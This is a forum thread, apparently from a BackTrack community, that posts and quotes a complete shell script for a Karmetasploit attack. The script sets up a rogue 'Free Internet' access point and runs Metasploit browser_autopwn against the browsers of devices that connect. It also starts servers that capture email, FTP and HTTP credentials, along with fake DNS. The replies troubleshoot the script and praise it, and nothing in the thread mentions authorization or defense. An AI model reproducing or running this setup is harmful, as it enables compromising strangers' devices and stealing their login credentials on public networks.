Karmetasploit Howto

[floyd]

So here's my little script for the hole stuff. Don't forget to copy your /etc/dhcp3/dhcpd.conf to somewhere else, so you can restore it later. You need a dir /root/Karmetasploit and change the interface names to your needs....

Code:

cd /root/Karmetasploit
airmon-ng start wlan0
aireplay-ng --test mon0
echo "option domain-name-servers 10.0.0.1;" > /etc/dhcp3/dhcpd.conf
echo "default-lease-time 60;" >> /etc/dhcp3/dhcpd.conf
echo "max-lease-time 72;" >> /etc/dhcp3/dhcpd.conf
echo "ddns-update-style none;" >> /etc/dhcp3/dhcpd.conf
echo "authoritative;" >> /etc/dhcp3/dhcpd.conf
echo "log-facility local7;" >> /etc/dhcp3/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> /etc/dhcp3/dhcpd.conf
echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "option domain-name-servers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "}" >> /etc/dhcp3/dhcpd.conf
xterm -e "airbase-ng -P -C 30 -e 'Free Internet' -v mon0" &
echo "sleeping to wait for interface"
sleep 10
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
echo "load db_sqlite3" > /root/Karmetasploit/karma.rc
echo "db_create /root/Karmetasploit/karma.db" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/browser_autopwn" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_HOST 10.0.0.1" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_PORT 55550" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_URI /ads" >> /root/Karmetasploit/karma.rc
echo "set LHOST 10.0.0.1" >> /root/Karmetasploit/karma.rc
echo "set LPORT 45000" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 55550" >> /root/Karmetasploit/karma.rc
echo "set URIPATH /ads" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/pop3" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 110" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/pop3" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 995" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/ftp" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/imap" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 143" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/imap" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 993" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/smtp" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 25" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/smtp" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 465" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/fakedns" >> /root/Karmetasploit/karma.rc
echo "unset TARGETHOST" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 5353" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/fakedns" >> /root/Karmetasploit/karma.rc
echo "unset TARGETHOST" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 53" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 80" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 8080" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 443" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 8443" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
xterm -e "/pentest/exploits/framework3/msfconsole -r /root/Karmetasploit/karma.rc" &

[m-1-k-3]

Quote:

Originally Posted by floyd

So here's my little script for the hole stuff. Don't forget to copy your /etc/dhcp3/dhcpd.conf to somewhere else, so you can restore it later. You need a dir /root/Karmetasploit and change the interface names to your needs....

nice stuff ... thx very much

m-1-k-3

[snipper_cr]

Well I followed your well written tutorial on the first page. I tested injection and that works. Following all the steps, the only error I got was during the "dhcpd -cf /etc/dhcp3/dhcpd.conf at0" which is the "Command not found" however you said to ignore the error, is that the error to ignore? Sounds like nothing is happening there.

Once I have airbase-ng running and I run the karma.rc script, I search for a network on my XP machine and I cannot find it (essid is "Free WiFi" per instructions). However, if I manually configure it in windows, I can "connect" but cannot pull an IP. airbase-ng shows a client associating with the network.

So any idea why its not pushing an IP or my XP machine cannot see the network on a normal scan?

Also [linux noobery], that script you just posted... what do I do with that? I tried running nano and saving it as "scripty.rc" and then running scripty.rc in that folder in the prompt...but, doing it wrong?

[annonimo]

Quote:

Originally Posted by snipper_cr

"dhcpd -cf /etc/dhcp3/dhcpd.conf at0"
try this dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

that worked for me.

[floyd]

Quote:

Originally Posted by snipper_cr

Well I followed your well written tutorial on the first page. I tested injection and that works. Following all the steps, the only error I got was during the "dhcpd -cf /etc/dhcp3/dhcpd.conf at0" which is the "Command not found" however you said to ignore the error, is that the error to ignore? Sounds like nothing is happening there.

Once I have airbase-ng running and I run the karma.rc script, I search for a network on my XP machine and I cannot find it (essid is "Free WiFi" per instructions). However, if I manually configure it in windows, I can "connect" but cannot pull an IP. airbase-ng shows a client associating with the network.

So any idea why its not pushing an IP or my XP machine cannot see the network on a normal scan?

Also [linux noobery], that script you just posted... what do I do with that? I tried running nano and saving it as "scripty.rc" and then running scripty.rc in that folder in the prompt...but, doing it wrong?

indeed it's dhcpd3 and not dhcpd. Try your tab key on your keyboard...

if you think you have to make a .rc script then you should go back to ubuntu, learn the basics and use this script in 1 year again.

We are not in the newbie area and we expect some basic knowledge!

[snipper_cr]

Quote:

Originally Posted by annonimo

that worked for me.

Thanks. Useful post +1, I'll give that a try.

Flyod, thanks for the clarification on scripts

[Oglon3r]

all set, ready to go this is going to be fun. awesome guide thank you, always learning something new with backtrack.

[Reeth]

Quote:

So here's my little script for the hole stuff. Don't forget to copy your /etc/dhcp3/dhcpd.conf to somewhere else, so you can restore it later. You need a dir /root/Karmetasploit and change the interface names to your needs....

Code:

cd /root/Karmetasploit
airmon-ng start wlan0
aireplay-ng --test mon0
echo "option domain-name-servers 10.0.0.1;" > /etc/dhcp3/dhcpd.conf
echo "default-lease-time 60;" >> /etc/dhcp3/dhcpd.conf
echo "max-lease-time 72;" >> /etc/dhcp3/dhcpd.conf
echo "ddns-update-style none;" >> /etc/dhcp3/dhcpd.conf
echo "authoritative;" >> /etc/dhcp3/dhcpd.conf
echo "log-facility local7;" >> /etc/dhcp3/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> /etc/dhcp3/dhcpd.conf
echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "option domain-name-servers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "}" >> /etc/dhcp3/dhcpd.conf
xterm -e "airbase-ng -P -C 30 -e 'Free Internet' -v mon0" &
echo "sleeping to wait for interface"
sleep 10
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
echo "load db_sqlite3" > /root/Karmetasploit/karma.rc
echo "db_create /root/Karmetasploit/karma.db" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/browser_autopwn" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_HOST 10.0.0.1" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_PORT 55550" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_URI /ads" >> /root/Karmetasploit/karma.rc
echo "set LHOST 10.0.0.1" >> /root/Karmetasploit/karma.rc
echo "set LPORT 45000" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 55550" >> /root/Karmetasploit/karma.rc
echo "set URIPATH /ads" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/pop3" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 110" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/pop3" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 995" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/ftp" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/imap" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 143" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/imap" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 993" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc

Wow! God Damn! this is the First thing using Airbase that Works!

Thank you very much floyd!

[Phyber.Apex]

Quote:

Originally Posted by floyd

You have an old version... Are you using BT4 Pre Final? Do you have internet connection (ifconfig eth0 up && dhclient eth0)? Login in as root. Try

apt-get update && apt-get upgrade && apt-get dist-upgrade

I have the following version:



Has anyone followed this guide successfully? I'm still figuring out why Metasploit only attacks when I try to reach an https page. When I want to reach a http site (like google.com), i see the "It works" page of apache (on the attacker pc /var/www/index.html) or if i shutdown apache first (apache2ctl stop) I don't see any page (404 not found). Any ideas?

I will post my script which I wrote to automate setting up karmetasploit when I get home...

Hey floyd,
don't know if you still have the error had the same issue but got it working with removing apache from the rc.d:

You can do this by running:

sudo update-rc.d -f apache2 remove

And if you decide you want apache2 to start by default again like it does now:

sudo update-rc.d apache2 defaults 91 09

Hope it works for you =D

[floyd]

Quote:

Originally Posted by Phyber.Apex

Hey floyd,
don't know if you still have the error had the same issue but got it working with removing apache from the rc.d:

You can do this by running:

sudo update-rc.d -f apache2 remove

And if you decide you want apache2 to start by default again like it does now:

sudo update-rc.d apache2 defaults 91 09

Hope it works for you =D

I figured that out too. I just added a /etc/init.d/apache stop to my script...